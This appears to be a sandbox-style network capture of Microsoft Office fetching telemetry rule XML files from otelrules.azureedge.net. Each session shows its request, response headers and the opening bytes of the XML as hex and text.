2024-10-30 02:55:56 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


Session IDSource IPSource PortDestination IPDestination Port
101192.168.2.55260913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:56 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:56 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDD74D2EC"
x-ms-request-id: 92d64d37-101e-0034-119c-2796ff000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025556Z-15b8d89586fmhjx6a8nf3qm53c00000001ag00000000626c
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:56 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
102192.168.2.55261013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:56 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:56 GMT
Content-Type: text/xml
Content-Length: 1427
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
ETag: "0x8DC582BE56F6873"
x-ms-request-id: fcac5f09-801e-007b-3f67-28e7ab000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025556Z-15b8d89586fmhkw429ba5n22m8000000090g000000001s9e
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:56 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


Session IDSource IPSource PortDestination IPDestination Port
103192.168.2.55261113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:56 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:56 GMT
Content-Type: text/xml
Content-Length: 1390
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
ETag: "0x8DC582BE3002601"
x-ms-request-id: 6796a20d-a01e-00ab-565f-279106000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025556Z-17c5cb586f65j4snvy39m6qus400000002pg00000000cuwh
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:56 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


Session IDSource IPSource PortDestination IPDestination Port
104192.168.2.55261213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:56 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:56 GMT
Content-Type: text/xml
Content-Length: 1401
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
ETag: "0x8DC582BE2A9D541"
x-ms-request-id: ee736da1-b01e-001e-7be0-260214000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025556Z-17c5cb586f6hn8cl90dxzu28kw00000007m0000000003r06
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:57 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


Session IDSource IPSource PortDestination IPDestination Port
105192.168.2.55261313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:57 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:57 GMT
Content-Type: text/xml
Content-Length: 1364
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
ETag: "0x8DC582BEB6AD293"
x-ms-request-id: 1c6b952c-401e-0048-780e-260409000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025557Z-15b8d89586fzhrwgk23ex2bvhw0000000ac0000000007yzu
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:57 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
106192.168.2.55261413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:57 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:57 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:57 GMT
Content-Type: text/xml
Content-Length: 1391
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF58DC7E"
x-ms-request-id: 92eac08a-601e-0001-29b2-26faeb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025557Z-16849878b7898p5f6vryaqvp58000000088000000000e4b9
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:57 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


Session IDSource IPSource PortDestination IPDestination Port
107192.168.2.55261513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:57 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:57 GMT
Content-Type: text/xml
Content-Length: 1354
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE0662D7C"
x-ms-request-id: a3bf04aa-f01e-001f-636e-285dc8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025557Z-r197bdfb6b4d9xksru4x6qbqr000000007kg0000000060b5
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:57 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


Session IDSource IPSource PortDestination IPDestination Port
108192.168.2.55261613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:57 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:57 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:57 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
ETag: "0x8DC582BDCDD6400"
x-ms-request-id: a1e8ab16-701e-0050-601c-266767000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025557Z-16849878b78p49s6zkwt11bbkn0000000760000000001kp0
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:57 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
109192.168.2.55261713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:57 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:57 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:57 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
ETag: "0x8DC582BDF1E2608"
x-ms-request-id: 141f8a5a-601e-000d-3b74-272618000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025557Z-16849878b78qwx7pmw9x5fub1c00000005hg00000000fnee
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:57 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
110192.168.2.55261813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:58 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:58 GMT
Content-Type: text/xml
Content-Length: 1399
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
ETag: "0x8DC582BE8C605FF"
x-ms-request-id: a4e3dea6-301e-005d-1111-29e448000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025558Z-17c5cb586f67hfgj2durhqcxk800000006cg0000000042qw
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:58 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


Session IDSource IPSource PortDestination IPDestination Port
111192.168.2.55261913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:58 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:58 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:58 GMT
Content-Type: text/xml
Content-Length: 1362
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
ETag: "0x8DC582BDF497570"
x-ms-request-id: 7b68ac53-d01e-0082-7e67-27e489000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025558Z-16849878b78smng4k6nq15r6s400000008y000000000d5kr
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:58 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
